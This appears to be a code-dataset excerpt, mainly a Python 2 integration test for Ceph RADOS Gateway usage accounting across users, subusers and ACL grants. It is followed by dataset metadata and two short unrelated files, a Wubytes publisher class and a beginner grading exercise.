                            os.chdir(ceph_path)
                            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict16)
                            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict17)
                            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict18)
                            os.chdir(py_dir)
                            if result1 == result2 == result3 == True:
                                print "testcase20 %s" % (ok_display("OK"))
                            else:
                                print "testcase20 %s" % (fail_display("FAIL"))
                        else:
                            print "testcase20 %s" % (fail_display("FAIL"))
                    else:
                        print "testcase20 %s" % (fail_display("FAIL"))
                else:
                    print "testcase20 %s" % (fail_display("FAIL"))
            else:
                print "testcase20 %s" % (fail_display("FAIL"))
        else:
            print "testcase20 %s" % (fail_display("FAIL"))
        self.clean()
    def clean(self):
        """Remove the buckets, trim user1's usage and delete user1."""
        exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
        exec_command('s3cmd -c user1.s3cfg rb s3://test2')
        time.sleep(30)
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin usage trim --uid=user1')
        exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
        os.chdir(py_dir)
class TestCase21(object):
    """Verify usage accounting across two users with an ACL write grant.

    user2 is granted write access to user1's bucket ``test1``; the ACL
    operations and the cross-user put are expected to show up in user1's
    usage (the bucket owner), while user2's own usage stays unchanged.
    """
    def prepare(self):
        """Create user1 (with two S3 subusers) and user2."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
        exec_based_on_version('radosgw-admin user create --uid=user2 --access-key=user2 --secret-key=user2 --display-name="user2"')
        os.chdir(py_dir)
    def op1(self):
        """Generate baseline traffic for both users."""
        exec_command('s3cmd -c user1.s3cfg mb s3://test1')
        exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
        exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
        exec_command('s3cmd -c user2.s3cfg mb s3://test01')
        exec_command('s3cmd -c user2.s3cfg put user2.s3cfg s3://test01')
        time.sleep(30)  # allow the usage log to be flushed
    def op2(self):
        """Grant user2 write access on test1, then let user2 put an object."""
        exec_command('s3cmd -c user1.s3cfg setacl s3://test1 --acl-grant=write:user2')
        exec_command('s3cmd -c user2.s3cfg put user2.s3cfg s3://test1')
        time.sleep(30)
    def op3(self):
        """Recursively delete bucket test1 (objects included)."""
        exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
        time.sleep(30)
    def clean(self):
        """Remove the remaining buckets, trim usage and delete both users."""
        exec_command('s3cmd -c user1.s3cfg rb s3://test2')
        exec_command('s3cmd -c user2.s3cfg rb s3://test01 --recursive')
        time.sleep(30)
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin usage trim --uid=user1')
        exec_based_on_version('radosgw-admin usage trim --uid=user2')
        exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
        exec_based_on_version('radosgw-admin user rm --uid=user2 --purge-data --purge-keys')
        os.chdir(py_dir)
    def run(self):
        """Check the expected counters after op1, op2 and op3 in turn."""
        result1 = result2 = result3 = result4 = False
        self.prepare()
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1}}},
                                  "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict4 = {"entries_size": 1,
                        "user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                            "put_obj": {"ops": 1, "successful_ops": 1}}}}}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict4)
        os.chdir(py_dir)
        if result1 == result2 == result3 == result4 == True:
            self.op2()
            # The ACL grant and user2's put are billed to the bucket owner
            # (user1); user2's own usage is unchanged.
            expect_dict5 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 2, "successful_ops": 2},
                                                               "put_acls": {"ops": 1, "successful_ops": 1},
                                                               "get_acls": {"ops": 1, "successful_ops": 1}}},
                                      "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict6 = expect_dict2
            expect_dict7 = expect_dict3
            expect_dict8 = {"entries_size": 1,
                            "user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                "put_obj": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict7)
            result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict8)
            os.chdir(py_dir)
            if result1 == result2 == result3 == result4 == True:
                self.op3()
                # The recursive bucket removal adds list/delete counters;
                # note delete_bucket records 2 ops with only 1 successful.
                expect_dict9 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 2, "successful_ops": 2},
                                                                   "put_acls": {"ops": 1, "successful_ops": 1},
                                                                   "get_acls": {"ops": 1, "successful_ops": 1},
                                                                   "list_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "delete_bucket": {"ops": 2, "successful_ops": 1},
                                                                   "multi_object_delete": {"ops": 1, "successful_ops": 1}}},
                                          "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict10 = expect_dict2
                expect_dict11 = expect_dict3
                expect_dict12 = expect_dict8
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict11)
                result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict12)
                os.chdir(py_dir)
                if result1 == result2 == result3 == result4 == True:
                    print "testcase21 %s" % (ok_display("OK"))
                else:
                    print "testcase21 %s" % (fail_display("FAIL"))
            else:
                print "testcase21 %s" % (fail_display("FAIL"))
        else:
            print "testcase21 %s" % (fail_display("FAIL"))
        self.clean()
class TestCase22(object):
    """Verify cross-user subuser accounting with ACL grants and failures.

    user2's subusers access user1's bucket via read/write grants; the test
    checks that each request is attributed to the right subuser entry, that
    removing user1's subuser2 leaves usage untouched, and that a denied put
    is recorded with successful_ops == 0 for both bucket owner and caller.
    """
    def prepare(self):
        """Create user1 (subuser1/subuser2) and user2 (subuser2/subuser3,
        with s3 keys subu02/subu03)."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
        exec_based_on_version('radosgw-admin user create --uid=user2 --access-key=user2 --secret-key=user2 --display-name="user2"')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user2 --subuser=subuser2 --access=full --access-key=subu02 --secret-key=subu02')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user2 --subuser=subuser3 --access=full --access-key=subu03 --secret-key=subu03')
        os.chdir(py_dir)
    def op1(self):
        """Generate baseline traffic; user2's subuser3 stays idle."""
        exec_command('s3cmd -c user1.s3cfg mb s3://test1')
        exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
        exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
        exec_command('s3cmd -c user2.s3cfg mb s3://test01')
        exec_command('s3cmd -c subu02.s3cfg put user2.s3cfg s3://test01')
        time.sleep(30)  # allow the usage log to be flushed
    def op2(self):
        """Grant user2 write+read on test1, then exercise the grants: put
        by user2, get by its subuser2, list by its subuser3."""
        exec_command('s3cmd -c user1.s3cfg setacl s3://test1 --acl-grant=write:user2')
        exec_command('s3cmd -c user1.s3cfg setacl s3://test1 --acl-grant=read:user2')
        exec_command('s3cmd -c user2.s3cfg put user2.s3cfg s3://test1')
        exec_command('s3cmd -c subu02.s3cfg get s3://test1/user2.s3cfg 22-1.txt')
        exec_command('s3cmd -c subu03.s3cfg ls s3://test1')
        time.sleep(30)
    def op3(self):
        """Remove user1's subuser2 (owner of bucket test2)."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser2')
        os.chdir(py_dir)
    def op4(self):
        """Attempt a put into test2 by user2's subuser2 (no grant, so the
        request is expected to fail)."""
        exec_command('s3cmd -c subu02.s3cfg put subu02.s3cfg s3://test2')
        time.sleep(30)
    def clean(self):
        """Remove all buckets, trim usage, delete both users and the
        downloaded 22*.txt scratch file."""
        exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
        exec_command('s3cmd -c user1.s3cfg rb s3://test2')
        exec_command('s3cmd -c user2.s3cfg rb s3://test01 --recursive')
        time.sleep(30)
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin usage trim --uid=user1')
        exec_based_on_version('radosgw-admin usage trim --uid=user2')
        exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
        exec_based_on_version('radosgw-admin user rm --uid=user2 --purge-data --purge-keys')
        os.chdir(py_dir)
        exec_command('rm 22*.txt')
    def run(self):
        """Check the six usage views after op1, op2, op3 and op4 in turn."""
        result1 = result2 = result3 = result4 = result5 = result6 = False
        self.prepare()
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1}}},
                                  "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict4 = {"entries_size": 1,
                        "user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                            "put_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict5 = {"entries_size": 1,
                        "user2:subuser2": {"test01": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
        # subuser3 has produced no traffic yet, so its usage is empty.
        expect_dict6 = {"entries_size": 0}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict4)
        result5 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser2', expect_dict5)
        result6 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser3', expect_dict6)
        os.chdir(py_dir)
        if result1 == result2 == result3 == result4 == result5 == result6 == True:
            self.op2()
            # All granted requests are billed to the bucket owner (user1);
            # the per-subuser views record which identity issued them.
            expect_dict7 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 2, "successful_ops": 2},
                                                               "get_acls": {"ops": 2, "successful_ops": 2},
                                                               "put_acls": {"ops": 2, "successful_ops": 2},
                                                               "get_obj": {"ops": 1, "successful_ops": 1},
                                                               "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                      "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict8 = expect_dict2
            expect_dict9 = expect_dict3
            expect_dict10 = expect_dict4
            expect_dict11 = {"entries_size": 1,
                             "user2:subuser2": {"test01": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
                                                "test1": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict12 = {"entries_size": 1,
                             "user2:subuser3": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
            result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict10)
            result5 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser2', expect_dict11)
            result6 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser3', expect_dict12)
            os.chdir(py_dir)
            if result1 == result2 == result3 == result4 == result5 == result6 == True:
                self.op3()
                # Removing user1's subuser2 must not change any usage view.
                expect_dict13 = expect_dict7
                expect_dict14 = expect_dict8
                expect_dict15 = expect_dict9
                expect_dict16 = expect_dict10
                expect_dict17 = expect_dict11
                expect_dict18 = expect_dict12
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict15)
                result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict16)
                result5 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser2', expect_dict17)
                result6 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser3', expect_dict18)
                os.chdir(py_dir)
                if result1 == result2 == result3 == result4 == result5 == result6 == True:
                    self.op4()
                    # The denied put is counted with successful_ops == 0,
                    # both for the bucket owner and the requesting subuser.
                    expect_dict19 = {"entries_size": 1,
                                     "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "put_obj": {"ops": 2, "successful_ops": 2},
                                                                        "get_acls": {"ops": 2, "successful_ops": 2},
                                                                        "put_acls": {"ops": 2, "successful_ops": 2},
                                                                        "get_obj": {"ops": 1, "successful_ops": 1},
                                                                        "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "put_obj": {"ops": 1, "successful_ops": 0}}}}}
                    expect_dict20 = expect_dict14
                    expect_dict21 = expect_dict15
                    expect_dict22 = expect_dict16
                    expect_dict23 = {"entries_size": 1,
                                     "user2:subuser2": {"test01": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
                                                        "test1": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}},
                                                        "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 0}}}}}
                    expect_dict24 = expect_dict18
                    os.chdir(ceph_path)
                    result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict19)
                    result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict20)
                    result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict21)
                    result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict22)
                    result5 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser2', expect_dict23)
                    result6 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser3', expect_dict24)
                    os.chdir(py_dir)
                    if result1 == result2 == result3 == result4 == result5 == result6 == True:
                        print "testcase22 %s" % (ok_display("OK"))
                    else:
                        print "testcase22 %s" % (fail_display("FAIL"))
                else:
                    print "testcase22 %s" % (fail_display("FAIL"))
            else:
                print "testcase22 %s" % (fail_display("FAIL"))
        else:
            print "testcase22 %s" % (fail_display("FAIL"))
        self.clean()
class TestCase23(object):
    """Verify how failed requests are recorded in the usage log.

    Requests against non-existent buckets are expected to appear under the
    pseudo-bucket "-" with successful_ops == 0; an s3cmd invocation that
    fails client-side (missing local file) must not change usage at all.
    """
    def prepare(self):
        """Create user1 with S3 subusers subuser1 and subuser2."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
        os.chdir(py_dir)
    def op1(self):
        """Generate baseline traffic: create, put and list on test1."""
        exec_command('s3cmd -c user1.s3cfg mb s3://test1')
        exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
        exec_command('s3cmd -c subuser2.s3cfg ls s3://test1')
        time.sleep(30)  # allow the usage log to be flushed
    def op2(self):
        """Put into a bucket that does not exist (expected to fail)."""
        exec_command('s3cmd -c user1.s3cfg put subuser1.s3cfg s3://test21331')
        time.sleep(30)
    def op3(self):
        """List a bucket that does not exist (expected to fail)."""
        exec_command('s3cmd -c subuser2.s3cfg ls s3://test77')
        time.sleep(30)
    def op4(self):
        """Put a local file that does not exist; s3cmd fails before any
        request is sent, so no usage entry is expected."""
        exec_command('s3cmd -c subuser1.s3cfg put dagfdagad s3://test1')
        time.sleep(30)
    def clean(self):
        """Remove bucket test1, trim user1's usage and delete user1."""
        exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
        time.sleep(30)
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin usage trim --uid=user1')
        exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
        os.chdir(py_dir)
    def run(self):
        """Check the usage views after op1, op2, op3 and op4 in turn."""
        result1 = result2 = result3 = False
        self.prepare()
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1},
                                                           "list_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        os.chdir(py_dir)
        if result1 == result2 == result3 == True:
            self.op2()
            # The failed put lands under the pseudo-bucket "-".
            expect_dict4 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 1, "successful_ops": 1},
                                                               "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                      "-": {"categories": {"put_obj": {"ops": 1, "successful_ops": 0}}}}}
            expect_dict5 = expect_dict2
            expect_dict6 = expect_dict3
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
            os.chdir(py_dir)
            if result1 == result2 == result3 == True:
                self.op3()
                # The failed list is recorded under "-" for both the user
                # and the subuser that issued it.
                expect_dict7 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1},
                                                                   "list_bucket": {"ops": 1, "successful_ops": 1}}},
                                          "-": {"categories": {"put_obj": {"ops": 1, "successful_ops": 0},
                                                               "list_bucket": {"ops": 1, "successful_ops": 0}}}}}
                expect_dict8 = expect_dict5
                expect_dict9 = {"entries_size": 1,
                                "user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "-": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 0}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
                os.chdir(py_dir)
                if result1 == result2 == result3 == True:
                    self.op4()
                    # A client-side failure sends no request: usage unchanged.
                    expect_dict10 = expect_dict7
                    expect_dict11 = expect_dict8
                    expect_dict12 = expect_dict9
                    os.chdir(ceph_path)
                    result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
                    result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict11)
                    result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict12)
                    os.chdir(py_dir)
                    if result1 == result2 == result3 == True:
                        print "testcase23 %s" % (ok_display("OK"))
                    else:
                        print "testcase23 %s" % (fail_display("FAIL"))
                else:
                    print "testcase23 %s" % (fail_display("FAIL"))
            else:
                print "testcase23 %s" % (fail_display("FAIL"))
        else:
            print "testcase23 %s" % (fail_display("FAIL"))
        self.clean()
if __name__ == '__main__':
    # Run every usage-accounting scenario in order.
    for case_class in (TestCase1, TestCase2, TestCase3, TestCase4,
                       TestCase5, TestCase6, TestCase7, TestCase8,
                       TestCase9, TestCase10, TestCase11, TestCase12,
                       TestCase13, TestCase14, TestCase15, TestCase16,
                       TestCase17, TestCase18, TestCase19, TestCase20,
                       TestCase21, TestCase22, TestCase23):
        case_class().run()
| [
"enming.zhang@umcloud.com"
] | enming.zhang@umcloud.com |
05ea985615632303be491be1f8e52b26dc8a23b5 | 87f57cf6e925c8d3aaac36f1dce33c613ce92cad | /publishers/wubytes_publisher.py | 7856fc67c78e26b3b2dccb6b4849a360f192d892 | [
"MIT"
] | permissive | weapp/miner | a0fe10ad1c7111a0641d535e90616da79b4f08c2 | e89bc2dc043889a9bbee21bd5c611154c2f84d06 | refs/heads/master | 2020-04-09T07:43:50.925072 | 2014-06-03T21:26:46 | 2014-06-03T21:26:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | from base_publisher import BasePublisher
from pprint import pprint as pp
from wu_client import WuClient
from shared.path import Path
class WubytesPublisher(BasePublisher):
def __init__(self, conf):
BasePublisher.__init__(self, conf)
self.wc = WuClient(conf["client_id"], conf["client_secret"], conf["host"])
if not self.wc.auth(conf["username"], conf["pass"]):
exit()
for key in self.project.project:
self.wc.new_wu({'data': 0, 'title': key, 'slug': key})
def publish(self, message):
for key, value in message.iteritems():
print key, value
self.wc.update_value(key, value)
| [
"weap88@gmail.com"
] | weap88@gmail.com |
48ee6be5fa369aab7a24d7f1be33ef53dfa886a5 | e452f89c51180487f2ed68c33ca2fed54e14a967 | /1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/02_Conditional-Statements/01.Lab-01-Excellent-Result.py | 4d9450ac08bdcaf06642e2351b5898ce2cc0b984 | [
"MIT"
] | permissive | karolinanikolova/SoftUni-Software-Engineering | c996f18eea9fb93164ab674614e90b357ef4858a | 7891924956598b11a1e30e2c220457c85c40f064 | refs/heads/main | 2023-06-21T23:24:55.224528 | 2021-07-22T16:15:59 | 2021-07-22T16:15:59 | 367,432,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # 1. Проверка за отлична оценка
# Първата задача от тази тема е да се напише конзолна програма, която чете оценка (реално число),
# въведена от потребителя и отпечатва "Excellent!", ако оценката е 5.50 или по-висока.
grade = float(input())
if grade >= 5.50:
print("Excellent!") | [
"Nikolova@eum.root.eumetsat.int"
] | Nikolova@eum.root.eumetsat.int |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.